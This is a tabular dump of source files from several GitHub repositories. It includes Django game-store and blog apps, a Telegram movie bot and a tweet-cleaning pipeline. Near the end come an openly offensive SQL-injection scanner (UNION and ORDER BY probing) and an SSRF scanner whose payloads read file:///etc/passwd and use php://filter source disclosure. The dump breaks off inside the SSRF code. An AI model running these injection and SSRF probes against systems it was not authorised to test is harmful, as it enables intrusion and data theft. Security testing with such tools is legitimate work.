index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
50,609 | vamshivarsa/game_store_website_django | refs/heads/master | /games/viewsold.py | from django.shortcuts import render
from django.http import HttpResponse,Http404
from .models import Game
def index(request):
    """Render the game index page listing every Game in the store."""
    context = {'all_games': Game.objects.all()}
    return render(request, 'games/gameindex.html', context)
#old format without render (here we used HttpResponse)
#-------------------------------------------------------------
'''html=''
for game in all_games:
url ='/games/' + str(game.id) + '/'
html+= '<a href ="' + url + '">'+str(game.name) + '</a><br>'
return HttpResponse(html)'''
#---------------------------------------------------------
def details(request, game_id):
    """Render the detail page for a single Game.

    Arguments:
        request: the incoming HttpRequest.
        game_id: primary key of the Game to display.

    Raises:
        Http404: if no Game with the given id exists.
    """
    try:
        game = Game.objects.get(id=game_id)
    except Game.DoesNotExist:
        # Fixed grammar of the user-facing 404 message.
        raise Http404("This game does not exist")
    # NOTE(review): the template is named 'games/404error.html' but is used as
    # the normal detail page -- confirm the template name is intentional.
    return render(request, 'games/404error.html', {'game': game})
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,610 | vamshivarsa/game_store_website_django | refs/heads/master | /games/urls.py | from django.contrib import admin
from django.urls import path,re_path
from .import views
# URL routes for the games app.
urlpatterns = [
    # Game list page.
    path('', views.IndexView.as_view(), name='index'),
    # Game detail page, keyed by numeric primary key.
    # NOTE(review): this route reuses name='index', duplicating the list
    # route's name; reverse lookups become ambiguous -- it likely should be
    # name='detail'. Not changed here because templates may reference it.
    re_path(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='index'),
]
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,611 | vamshivarsa/game_store_website_django | refs/heads/master | /games/views.py | from django.views import generic
from .models import Game
class IndexView(generic.ListView):
    """Class-based list view showing every Game."""
    template_name = 'games/gameindex.html'
    def get_queryset(self):
        """Return all Game rows for the list page."""
        return Game.objects.all()
class DetailView(generic.DetailView):
model = Game
template_name = 'games/404error.html' | {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,612 | vamshivarsa/game_store_website_django | refs/heads/master | /todolist/models.py | from django.db import models
# Create your models here.
class TodoItem(models.Model):
    """A single free-text to-do entry."""

    # The to-do text itself.
    field = models.TextField()

    def __str__(self):
        """Use the stored text as the item's display string."""
        return self.field
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,613 | vamshivarsa/game_store_website_django | refs/heads/master | /games/models.py | from django.db import models
class Game(models.Model):
    """One catalogue entry in the game store."""

    name = models.CharField(max_length=1000)
    game_type = models.CharField(max_length=1000)
    price = models.CharField(max_length=1000)
    game_img = models.CharField(max_length=1000)

    def __str__(self):
        """Display a game as 'name-type-price'."""
        return '-'.join((self.name, self.game_type, self.price))
| {"/todolist/views.py": ["/todolist/models.py"], "/games/viewsold.py": ["/games/models.py"], "/games/views.py": ["/games/models.py"]} |
50,614 | vjkuznetsov/heroku-telegram-bot | refs/heads/master | /search_engine.py | import wikipedia
from cinema_bot_exception import CinemaBotException
from serpapi.google_search_results import GoogleSearchResults
# Russian query fragments appended to user searches:
# "смотреть онлайн" = "watch online", "постер" = "poster", "фильм" = "movie".
WATCH_QUERY_FIXTURE = r"смотреть онлайн"
POSTER_QUERY_FIXTURE = r"постер"
INFO_PREFIX = r"фильм"
# cfg (depends on serp api format)
WATCH_RESULT = "organic_results"
WATCH_CATEGORY = "link"
POS = 0  # always take the first search result
POSTER_RESULT = "images_results"
POSTER_SIZE = "original"
def watch(message, cfg):
    """Search for a link to watch the movie named in *message*.

    :param message: user-provided movie title.
    :param cfg: extra serpapi query parameters (api key, engine, ...).
    :return: the first organic result link.
    :raises CinemaBotException: if the search fails or returns no usable result.
    """
    params = {"q": f"{message} {WATCH_QUERY_FIXTURE}"}
    params.update(cfg)
    try:
        result = _search(params)
        return result[WATCH_RESULT][POS][WATCH_CATEGORY]
    except Exception as exc:
        # Chain the original exception so the real cause stays in tracebacks.
        raise CinemaBotException(*exc.args) from exc
def info(message, cfg):
    """Return a Wikipedia summary for the movie named in *message*.

    :param message: user-provided movie title.
    :param cfg: config dict; cfg["language"] selects the Wikipedia language.
    :raises CinemaBotException: on any lookup failure.
    """
    find_query = f"{message} {INFO_PREFIX}"
    try:
        wikipedia.set_lang(cfg["language"])
        # Return directly; the original bound a local `info`, shadowing this
        # module-level function's name.
        return wikipedia.summary(find_query)
    except Exception as exc:
        # Chain the original exception so the real cause stays in tracebacks.
        raise CinemaBotException(*exc.args) from exc
def poster(message, cfg):
    """Return a link to the original-size poster image for *message*.

    :param message: user-provided movie title.
    :param cfg: extra serpapi query parameters.
    :raises CinemaBotException: on any search failure.
    """
    params = {"q": message}
    params.update(cfg)
    params.update({"tbm": "isch"})  # image search
    try:
        result = _search(params)
        return result[POSTER_RESULT][POS][POSTER_SIZE]
    except Exception as exc:
        # Chain the original exception so the real cause stays in tracebacks.
        raise CinemaBotException(*exc.args) from exc
def _search(params):
    """Run a serpapi Google search and return the parsed result dict."""
    client = GoogleSearchResults(params)
    return client.get_dict()
| {"/bot.py": ["/search_engine.py"]} |
50,615 | vjkuznetsov/heroku-telegram-bot | refs/heads/master | /bot.py | import datetime
import os
import telebot
import urllib
import yaml
import search_engine
from io import BytesIO
from cinema_bot_exception import CinemaBotException
# User-facing bot messages.
WELCOME_MESSAGE = r"""
Hello, i'm cinemabot by Vladimir Kuznetsov (v.j.kuznetsov@gmail.com)
Allowed commands:
/find - looking for a link to watching a movie
/info - print summary about the movie
/poster - print poster
"""
API_KEY_EXCEEDED_MESSAGE = r"""
Error: api_key exceeded, please contact the administrator"""
ERROR_MESSAGE = r"""
An error occurred during the search, please contact the administrator."""
# load configuration (import-time side effect: reads cfg.yml from the CWD)
with open('cfg.yml', 'r') as ymlfile:
    cfg = yaml.load(ymlfile, Loader=yaml.Loader)
# load tokens from the environment
telegram_token = os.getenv('TELEGRAM_TOKEN')
cfg_se = cfg['search_engine']
cfg_se['api_key'] = os.getenv('SE_TOKEN')
def _check_api_key_expired(cfg):
    """Return True when the configured serpapi key expiry date has passed.

    Arguments:
    cfg -- dict with configuration from yaml
    """
    today = datetime.datetime.now().date()
    return cfg["serpapi"]["expired_date"] < today
def _exc_logger(message, exc):
    """Logged error

    Arguments:
    message -- received messages
    exc -- exception object"""
    # NOTE: the trailing backslash continues the f-string literal across
    # source lines; whitespace at the continuation point becomes part of the
    # printed message.
    print(f"{datetime.datetime.now()}: Exception raises:\
{exc.args} after income message: {message}")
bot = telebot.TeleBot(telegram_token)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
    """Reply to /start and /help with usage help, or an expiry notice."""
    if _check_api_key_expired(cfg):
        bot.reply_to(message, API_KEY_EXCEEDED_MESSAGE)
    else:
        bot.reply_to(message, WELCOME_MESSAGE)
@bot.message_handler(commands=['find'])
def search_watch(message):
    """Handle /find: reply with a link for watching the requested movie."""
    # BUG FIX: str.lstrip('/find') strips any of the characters '/', 'f',
    # 'i', 'n', 'd' from the left, not the literal prefix; slice it off.
    message_text = message.text[len('/find'):]
    try:
        result = search_engine.watch(message_text, cfg_se)
        bot.send_message(message.chat.id, result)
    except CinemaBotException as exc:
        _exc_logger(message, exc)
        bot.send_message(message.chat.id, ERROR_MESSAGE)
@bot.message_handler(commands=['info'])
def search_info_(message):
    """Handle /info: reply with a Wikipedia summary of the requested movie."""
    # BUG FIX: lstrip('/info') strips a character set, not the prefix;
    # slice the command off instead.
    message_text = message.text[len('/info'):]
    try:
        wiki_summary = search_engine.info(message_text, cfg_se)
        bot.send_message(message.chat.id, wiki_summary)
    except CinemaBotException as exc:
        _exc_logger(message, exc)
        bot.send_message(message.chat.id, ERROR_MESSAGE)
@bot.message_handler(commands=['poster'])
def search_poster_(message):
    """Handle /poster: fetch the poster image and send it as a photo."""
    # BUG FIX: lstrip('/poster') strips a character set, not the prefix;
    # slice the command off instead.
    message_text = message.text[len('/poster'):]
    try:
        result_link = search_engine.poster(message_text, cfg_se)
        bot.send_photo(message.chat.id,
                       BytesIO(urllib.request.urlopen(result_link).read()))
    except CinemaBotException as exc:
        _exc_logger(message, exc)
        bot.send_message(message.chat.id, ERROR_MESSAGE)
if __name__ == '__main__':
    # Start long polling for Telegram updates; blocks until interrupted.
    bot.polling()
| {"/bot.py": ["/search_engine.py"]} |
50,616 | mkilli83/twitter-classifier | refs/heads/master | /src/core.py | # -*- coding: utf-8 -*-
import datetime
import re
from pprint import pformat
import GetOldTweets3 as got
import pandas as pd
from src.utils import Timer, load_csv, paths
# Columns of interest when working with the tweet DataFrame.
USE_TWEETS_COLS = ["username", "formatted_date", "cleaned_text", "text"]
# Which cleaning steps clean_tweets_text applies; keys map to entries in
# create_preprocessing_functions' function table.
PRE_PROCESSING_OPTIONS = {
    # custom
    "lower_string": True,
    "remove_url": True,
    "remove_at_string": True,
    # gensim
    "remove_stopwords": True,
    "split_alphanum": False,
    "stem_text": False,
    "strip_non_alphanum": False,
    "strip_punctuation": True,
    "strip_tags": True,
    "strip_numeric": True,
    "strip_multiple_whitespaces": True,
}
def get_raw_tweets(query_dict):
    """
    Get raw tweets
    :param query_dict:
        query_string: 'datacamp lang:en'
        time_since: '2019-03-01'
        time_until: '2019-05-01'
        max_tweets: 0 for unlimited
    :return: dataframe
    """
    file_name = _convert_query_dict_to_str_as_filename(query_dict)
    save_raw_file_name = paths.raw_tweets / f"raw_{file_name}.csv"
    print(file_name)
    # Cache layer: reuse a previously saved CSV for the same query if present.
    if save_raw_file_name.is_file():
        print(f"Raw file {repr(save_raw_file_name)} already exists, reload")
        tweet_df = load_csv(save_raw_file_name)
    else:
        _validate_query(query_dict)
        print(f"Getting raw tweets with query:\n{query_dict!r}")
        tweet_criteria = _create_search_criteria(**query_dict)
        tweet_objects = _get_tweet_object(tweet_criteria)
        tweet_df = _convert_tweets_to_dataframe(tweet_objects)
        # Persist so the next call with the same query hits the cache above.
        print(f"Saving raw tweets to: {repr(save_raw_file_name)}")
        tweet_df.to_csv(save_raw_file_name, index=False)
    print("Done getting raw tweets.")
    return tweet_df
def clean_tweets_text(tweet_df):
    """Add a 'cleaned_text' column to tweet_df and drop rows whose text
    cleans down to nothing; returns a new, re-indexed DataFrame."""
    with Timer("clean tweets text"):
        cleaner = create_preprocessing_functions(PRE_PROCESSING_OPTIONS)
        tweet_df["cleaned_text"] = tweet_df["text"].apply(cleaner)
        is_empty = tweet_df["cleaned_text"].isna() | (tweet_df["cleaned_text"] == "")
        n_empty = is_empty.sum()
        print(
            f"There are {n_empty:,} number of empty text after cleaning, dropping them"
        )
        tweet_df = tweet_df[~is_empty].reset_index(drop=True)
    return tweet_df
def create_preprocessing_functions(pre_processing_options):
    """
    Creates a preprocessing function that iterates through user-defined preprocessing steps to clean a tweet
    :param pre_processing_options:
        # custom
        'lower_string': True,
        'remove_url': True,
        'remove_at_string': True,
        # gensim
        'remove_stopwords': True,
        'split_alphanum': False,
        'stem_text': False,
        'strip_non_alphanum': False,
        'strip_punctuation': True,
        'strip_tags': True,
        'strip_numeric': True,
        'strip_multiple_whitespaces': True,
    :return: function
    """
    # Imported lazily so the heavy NLP deps only load when cleaning is used.
    import gensim.parsing.preprocessing as p
    import preprocessor

    pre_processing_options_str_formatted = pformat(pre_processing_options, indent=2)
    print(
        f"Preprocessing tweet text with following choices:\n{pre_processing_options_str_formatted}\n"
    )
    # remove URL and emoji and simple smiley
    preprocessor.set_options(
        preprocessor.OPT.URL, preprocessor.OPT.EMOJI, preprocessor.OPT.SMILEY
    )
    # Complete list of pre-processing functions
    pre_processing_funcs = {
        # custom
        "lower_string": lambda s: s.lower(),
        "remove_url": preprocessor.clean,
        "remove_at_string": lambda s: re.sub(r"@\w+", "", s),
        # gensim
        "remove_stopwords": p.remove_stopwords,
        "split_alphanum": p.split_alphanum,
        "stem_text": p.stem_text,
        "strip_non_alphanum": p.strip_non_alphanum,
        "strip_numeric": p.strip_numeric,
        "strip_punctuation": p.strip_punctuation,
        "strip_tags": p.strip_tags,
        "strip_multiple_whitespaces": p.strip_multiple_whitespaces,
    }
    # Select preprocessing functions defined in PRE_PROCESSING_OPTIONS.
    # NOTE: functions run in dict insertion order of the options mapping.
    use_preprocessing_funcs = []
    for k, v in pre_processing_options.items():
        if v:
            use_preprocessing_funcs.append(pre_processing_funcs[k])
    # Additional preprocessing function to remove curly quotation marks
    patch = lambda s: re.sub(r"(“|”|’)", "", s)
    use_preprocessing_funcs.append(patch)
    # Defines function that iterates through preprocessing items and applies them on tweet
    def _preprocessing_func(s):
        s_processed = s
        for f in use_preprocessing_funcs:
            s_processed = f(s_processed)
        return s_processed
    return _preprocessing_func
def _convert_query_dict_to_str_as_filename(query_dict):
    """Join the query values with '_' and replace spaces, for use as a
    cache filename fragment."""
    joined = "_".join(str(value) for value in query_dict.values())
    return joined.replace(" ", "_")
def _validate_query(query_dict):
    """Raise ValueError unless query_dict contains every required key."""
    required_keys = ("query_string", "time_since", "time_until", "max_tweets")
    missing = [key for key in required_keys if key not in query_dict]
    if missing:
        raise ValueError(f"{query_dict} does not have all required keys")
    print("(All required query arguments are provided)")
def _create_search_criteria(query_string, time_since, time_until, max_tweets):
    """
    Creates a tweet query using the twitter API
    :params
        query_string: 'datacamp lang:en'
        since: '2019-03-01'
        until: '2019-05-01'
        max_tweets: 0 for unlimited
    :returns tweetCriteria
    """
    # NOTE(review): ' lang:en' is always appended here; if the caller's
    # query_string already contains 'lang:en' it is duplicated -- confirm.
    tweetcriteria = (
        got.manager.TweetCriteria()
        .setQuerySearch(f"{query_string} lang:en")
        .setSince(time_since)
        .setUntil(time_until)
        .setMaxTweets(max_tweets)
    )
    return tweetcriteria
def _get_tweet_object(tweet_criteria):
    """Execute the GetOldTweets3 query and return the list of tweet objects,
    logging start time and result count."""
    with Timer("Get tweets"):
        current_time = datetime.datetime.now().replace(microsecond=0)
        print(f"Start tweet query at: {current_time}")
        tweets = got.manager.TweetManager.getTweets(tweet_criteria)
        print(f"Done query, {len(tweets):,} tweets returned")
    return tweets
def _convert_tweets_to_dataframe(tweets):
    """
    :param:
        tweets: list of tweet object
    :returns dataframe with one column per tweet attribute
    """
    records = [vars(tweet) for tweet in tweets]
    return pd.DataFrame.from_records(records)
def validation_of_ci():
    """Placeholder used to validate the CI pipeline; intentionally a no-op."""
    return None
# print(tabulate(t, headers="keys"))
| {"/src/core.py": ["/src/utils.py"]} |
50,617 | mkilli83/twitter-classifier | refs/heads/master | /src/utils.py | import logging
import os
import pickle
from datetime import datetime as dt
from time import time
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix
from sklearn.utils.multiclass import unique_labels
plt.style.use("ggplot")
def load_csv(file_name, list_type_colname=None, **kwargs):
    """Read a CSV into a DataFrame; optionally parse one column of
    stringified Python literals (e.g. "[1, 2]") back into objects.

    :param file_name: path passed straight to pandas.read_csv.
    :param list_type_colname: column to run ast.literal_eval over, or None.
    """
    frame = pd.read_csv(file_name, **kwargs)
    if list_type_colname is None:
        return frame
    from ast import literal_eval
    frame[list_type_colname] = frame[list_type_colname].apply(literal_eval)
    return frame
# __enter__/__exit__ allow use with the `with` statement
class Timer(object):
    """Context manager that prints how long its body took, in minutes."""

    def __init__(self, description):
        self.description = description

    def __enter__(self):
        self.start = time()
        # Fixed: return self so `with Timer(...) as t:` binds the timer
        # instead of None.
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Renamed first parameter (was `type`, shadowing the builtin).
        self.end = time()
        print(f"{self.description}, time took: {(self.end - self.start) / 60:.2f} mins")
def get_paths(create_dir=True):
    """Build a namespace of project data directories under the CWD.

    :param create_dir: when True, ensure each directory exists on disk.
    :return: SimpleNamespace with 'cleaned_tweets' and 'raw_tweets' Paths.
    """
    from pathlib import Path
    from types import SimpleNamespace  # SimpleNamespace is just a quick class

    cwd = Path(os.getcwd())
    print(f"Current working directory: {repr(cwd)}")
    dir_names = [
        "cleaned_tweets",
        "raw_tweets",
    ]  # file_paths = ['cleaned_tweets', 'raw_tweets', 'pics', 'models']
    # Map each directory name to an absolute Path under the CWD.
    path_map = {name: cwd / name for name in dir_names}
    if create_dir:
        for directory in path_map.values():
            os.makedirs(str(directory), exist_ok=True)
    return SimpleNamespace(**path_map)
paths = get_paths()
| {"/src/core.py": ["/src/utils.py"]} |
50,639 | dokhiem/pythonweb-site | refs/heads/master | /blog/models.py | from django.db import models
from django.conf import settings
# Create your models here.
class Post(models.Model):
    """A blog post with an optional image."""
    title=models.CharField(max_length=100)
    body=models.TextField()
    date=models.DateTimeField(auto_now_add=True)
    image=models.ImageField(null=True)
    def __str__(self):
        """Display posts by their title."""
        return self.title
class Comment(models.Model):
post=models.ForeignKey(Post,on_delete=models.CASCADE,related_name='comments')
author=models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)
body=models.TextField()
date=models.DateTimeField(auto_now_add=True) | {"/blog/views.py": ["/blog/models.py"]} |
50,640 | dokhiem/pythonweb-site | refs/heads/master | /blog/views.py | #from blog.forms import CommentForm
from msilib.schema import ListView
from tempfile import template
from django.shortcuts import get_object_or_404, render
from .models import Post, Comment
from .forms import CommentForm
from django.http import Http404,HttpResponseRedirect
from django.views.generic import ListView,DetailView
# Create your views here.
def post(request, pk):
    """Show a single blog post and handle comment submission for it."""
    blog_post = get_object_or_404(Post, pk=pk)
    comment_form = CommentForm()
    if request.method == 'POST':
        comment_form = CommentForm(request.POST, author=request.user, post=blog_post)
        if comment_form.is_valid():
            comment_form.save()
            # Redirect after POST so refreshing doesn't resubmit the comment.
            return HttpResponseRedirect(request.path)
    return render(request, "blog/post.html", {"post": blog_post, "form": comment_form})
'''def list(request):
Data = {'Posts': Post.objects.all().order_by('-date')}
return render(request, 'blog/blog.html', Data)
def post(request,id):
try:
post= Post.objects.get(id=id)
except Post.DoesNotExist:
raise Http404("Bài viết không tồn tại")
return render(request,'blog/post.html',{'post':post})'''
class PostListView(ListView):
    """Paginated blog index, newest posts first."""
    queryset=Post.objects.all().order_by('-date')
    template_name='blog/blog.html'
    context_object_name='Posts'
    # NOTE(review): one post per page -- confirm this tiny page size is intended.
    paginate_by=1
class PostDetailView(DetailView):
    """Detail page for a single Post."""
    model=Post
    template_name='blog/post.html'
| {"/blog/views.py": ["/blog/models.py"]} |
50,646 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/union.py | # -*- coding: UTF-8 -*-
from difflib import SequenceMatcher
import requests
import sys
from urllib import parse
import re
import aiohttp
from colorama import Fore, Style, Back
class ScanUnion():
    """UNION-based SQL injection scanner for a single target.

    For GET, the injection point in self.url is marked with a '*' placeholder;
    for POST, a raw request template file supplies headers and form data, with
    '*' marking the injected field. Findings are printed to stdout.
    """
    def __init__(self,url,method = "GET",file = "sql_injection/payload/header.txt"):
        self.url = url
        self.field_count = 0
        self.ifInjection = False
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
        }
        self.method = method
        # Prefix candidates (quote/paren closings) discovered per target.
        self.pre_dict = []
        self.filed_num = 50
        # SQL comment suffixes used to terminate the original statement.
        self.stuffix = ["#","-- "]
        self.size = 10  # width of the position marker used in union_inject
        self.cookie = {"PHPSESSID":"l4d5vimt214shhrop6etsr22k4","security":"low"}
        self.data = {}
        self.postHeaders = {}
        self.header_file = file
    def get_ratio(self,payload,res_text):
        """Similarity ratio between the page for *payload* and *res_text*."""
        seqm = SequenceMatcher()
        text = self.get_page(payload)
        seqm.set_seq1(text)
        seqm.set_seq2(res_text)
        return seqm.ratio()
    def get_page(self,payload):
        """Fetch the target page with *payload* substituted at the '*' mark."""
        if self.method == "GET":
            payload = parse.quote(payload.encode("utf-8"))
            url = self.url.replace("*",payload)
            text = requests.get(url,headers = self.headers,cookies = self.cookie).content
            return text.decode("utf-8")
        else:
            self.prepare_post(payload)
            text = requests.post(self.url,headers = self.postHeaders,data = self.data).content
            return text.decode("utf-8")
    def make_payload(self,payload):
        """Yield (full_payload, prefix) pairs for every prefix/suffix combo."""
        if self.method == "GET":
            for stuffix in self.stuffix:
                for pre in self.pre_dict:
                    # Splice the payload in front of the 'and ...' part of the
                    # previously-validated probe string.
                    and_position = pre.index("an")
                    result = str(pre[:and_position]) + payload + stuffix + pre[and_position:]
                    yield result,pre
        else:
            for stuffix in self.stuffix:
                for pre_ in self.pre_dict:
                    result = pre_ + payload + stuffix
                    yield result,pre_
    def prepare_post(self,payload):
        """Parse the raw request template into self.postHeaders / self.data,
        substituting *payload* for the field marked with '*'."""
        with open(self.header_file,"r") as f:
            for i in f:
                if not self.postHeaders:
                    if ":" in i.strip("\n"):
                        temp = i.strip("\n").split(":")
                        self.postHeaders[temp[0]] = temp[1].strip(" ")
                    if "&" in i.strip("\n"):
                        temp = i.strip("\n").split("&")
                        for data_ in temp:
                            data1 = data_.split("=")
                            if "*" in data1:
                                self.data[data1[0]] = payload
                            else:
                                self.data[data1[0]] = data1[1].strip(" ")
                else:
                    if ":" in i.strip("\n"):
                        temp = i.strip("\n").split(":")
                        self.postHeaders[temp[0]] = temp[1].strip(" ")
                    if "&" in i.strip("\n"):
                        temp = i.strip("\n").split("&")
                        for data_ in temp:
                            data1 = data_.split("=")
                            if "*" in data1:
                                self.data[data1[0]] = payload
                            else:
                                self.data[data1[0]] = data1[1].strip(" ")
    def check_if_can_inject(self):
        """Boolean-diff probe: compare pages for true/false payload pairs and
        collect working prefixes into self.pre_dict."""
        sys.stdout.write(Fore.LIGHTGREEN_EX + "[~]checking whether can be injected......\n")
        with open("sql_injection/payload/payload1.txt","r") as f:
            for i in f:
                false_payload = i.strip("\n")
                # '8'->'6' turns the false condition into its true twin.
                true_payload = false_payload.replace('8','6')
                false_page = self.get_page(false_payload)
                if "You have an error in your SQL syntax" in false_page:
                    continue
                ratio = self.get_ratio(true_payload,false_page)
                #print(ratio,true_payload,sep = " => ")
                if ratio <0.994:
                    self.pre_dict.append(true_payload.replace("1","0"))
        #print(self.pre_dict)
        if self.pre_dict:
            sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]it can be injected\n")
            return True
        else:
            sys.stdout.write(Fore.LIGHTRED_EX + "[-]it can't be injected\n")
            return False
    def padding(self,str_):
        """Right-pad *str_* with '*' to self.size characters."""
        return str_ + "*" * (self.size-len(str_))
    def get_field_num(self):
        """Binary-search the SELECT column count via ORDER BY probes.

        Returns the column count on success, False otherwise."""
        with open("sql_injection/payload/order.txt","r") as f:
            for order in f:
                start = 0
                filed_num = 50
                temp_num = 0
                count = 100  # avoid an infinite loop
                flag = 1000
                while True:
                    payload_ = order.strip("\n") + " " + "{}".format(filed_num)
                    for payload,pre in self.make_payload(payload_):
                        #print(payload)
                        page = self.get_page(payload)
                        if "Unknown column '{}' in 'order clause'".format(filed_num) in page:
                            # Guess too high: keep only the working prefix and
                            # bisect downward.
                            self.pre_dict.clear()
                            self.pre_dict.append(pre)
                            flag -= 1
                            temp_num = filed_num
                            filed_num = int((start + filed_num) / 2)
                            break
                        elif "You have an error in your SQL syntax" in page:
                            count -= 1
                            continue
                        elif flag == 1000:
                            continue
                        else:
                            # Guess accepted: bisect upward.
                            start = filed_num
                            filed_num = int((start + temp_num) / 2)
                            count -= 1
                            if start != temp_num - 1:
                                break
                            else:
                                sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]order sentence is {}\n".format(order.strip("\n")))
                                return filed_num
                    if count == 0:
                        break
        return False
    def union_inject(self):
        """Run the full UNION scan: find the column count, then inject marker
        strings to report which output positions echo injected data."""
        if self.method == "GET":
            if not self.check_if_can_inject():
                sys.exit(0)
        else:
            # POST: try every common quote/paren closing as the prefix.
            self.pre_dict = ["' ",'" ',"') "," ","')) ",")' ","))' ",'") ','")) ',')" ','))" ']
        result = ""
        union_payload = []
        filed_num = self.get_field_num()
        if filed_num:
            sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]The column number is {}\n".format(filed_num))
            sys.stdout.write(Fore.LIGHTGREEN_EX + "[~]strat getting inject position......\n")
            # Variant 1: plain comma-separated marker columns.
            for i in range(1,filed_num+1):
                result += "'{}'".format("000" + self.padding(str(i)) + "000")+ ","
            union_payload.append(result[:-1])
            result = ""
            # Variant 2: nested SELECT ... JOIN form (bypasses comma filters).
            for i in range(1,filed_num+1):
                result += "(SelEct('{}'))".format("000" + self.padding(str(i)) + "000")+ 'a'*i + " join "
            union_payload.append(result[:-5])
            for pyload in union_payload:
                with open("sql_injection/payload/union.txt","r") as f:
                    for union in f:
                        payload_ = union.strip("\n") + pyload
                        for payload,pre in self.make_payload(payload_):
                            position_set = set()
                            page = self.get_page(payload)
                            if "You have an error in your SQL syntax" in page:
                                continue
                            # Markers look like 000<index padded with *>000.
                            str2 = re.findall("000([0-9*]{10})000",page)
                            if str2:
                                sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload: {}\n".format(payload))
                                for position in str2:
                                    if not position in position_set:
                                        position_set.add(position)
                                if position_set:
                                    while position_set:
                                        sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]position {} can be injected\n".format(position_set.pop().split("*")[0]))
                                    sys.exit(0)
                                else:
                                    continue
        else:
            sys.stdout.write(Fore.LIGHTRED_EX + "[-]can't get field num\n")
            sys.exit(0)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,647 | PanDa1G1/sunsecScanner | refs/heads/master | /ssrf/ssrf.py | import requests
import re
import sys
import asyncio
from aiohttp import ClientSession
from difflib import SequenceMatcher
from urllib.parse import quote
from colorama import Fore, Style, Back
class ssrfScan():
    """SSRF probe suite for a URL whose injection point is marked with '*'.

    Tests dict://, file://, php:// wrappers, internal HTTP targets from a
    wordlist (async), and a 302-redirect bypass. Findings go to stdout.
    """
    def __init__(self,url,remoteFile=None,num=100):
        self.url = url
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
        }
        # Candidate internal URLs to probe with httpScan.
        self.queue = asyncio.Queue()
        self.tasks=[]
        self.loop = asyncio.get_event_loop()
        # Attacker-hosted 302 redirector used by redirectScan.
        self.remoteFile = remoteFile
        self.num = num  # number of concurrent httpScan coroutines
    # dict:// protocol probe
    def dictScan(self):
        payload = "dict://127.0.0.1:80/sunsec_test"
        url = self.url.replace("*",payload)
        content = requests.get(url,headers = self.headers).text
        #print(content)
        if re.search("HTTP\/(.|\n)*Server:(.|\n)*",content):
            sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dict protocol is available!\n")
    # file:// protocol probe
    def FileScan(self):
        payload = "file:///etc/passwd"
        url = self.url.replace("*",payload)
        content = requests.get(url,headers = self.headers).text
        #print(content)
        if "root:x:0:0:root:/root:/bin/bash" in content:
            sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]file protocol is available!\n")
    # php:// filter-wrapper probe (base64 source disclosure)
    def phpScan(self):
        file = self.url.split("/")[-1].split("?")[0]
        payload = "php://filter/read=convert.base64-encode/resource={}".format(file)
        url = self.url.replace("*",payload)
        content = requests.get(url,headers = self.headers).text
        #print(content)
        if re.search("[a-z0-9A-Z=+/]{60}",content):
            sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]php protocol is available!\n")
    def url_in_queue(self):
        """Load candidate internal URLs from ssrf/url.txt into the queue."""
        file = "ssrf/url.txt"
        with open(file,"rb") as f:
            for item in f:
                self.queue.put_nowait(item.decode("utf-8").strip("\r\n"))
    async def get_response(self,url,session):
        """Fetch the target with *url* substituted at '*'; return body text."""
        url = self.url.replace("*",url)
        #print(url)
        s = await session.get(url,headers = self.headers)
        return await s.text()
    def get_ratio(self,res_text):
        """Similarity between *res_text* and the page fetched without payload."""
        seqm = SequenceMatcher()
        url = self.url.split("?")[0]
        text = requests.get(url,headers = self.headers).text
        #print(text,res_text,sep="\n========================\n")
        seqm.set_seq1(text)
        seqm.set_seq2(res_text)
        return seqm.ratio()
    async def httpScan(self):
        """Worker coroutine: drain the queue and flag URLs whose response
        differs strongly from the baseline page."""
        session = ClientSession()
        while True:
            if not self.queue.empty():
                url = await self.queue.get()
                #print(url)
                try:
                    text = await self.get_response(url,session)
                    ratio = self.get_ratio(text)
                    #print(ratio)
                    if ratio < 0.3 and "400 Bad Request" not in text:
                        sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]ip {} is available!\n".format(url))
                except:
                    # Best-effort scan: unreachable targets are skipped silently.
                    pass
            else:
                #print(param)
                await session.close()
                break
    def start(self):
        """Spawn self.num httpScan workers and run them to completion."""
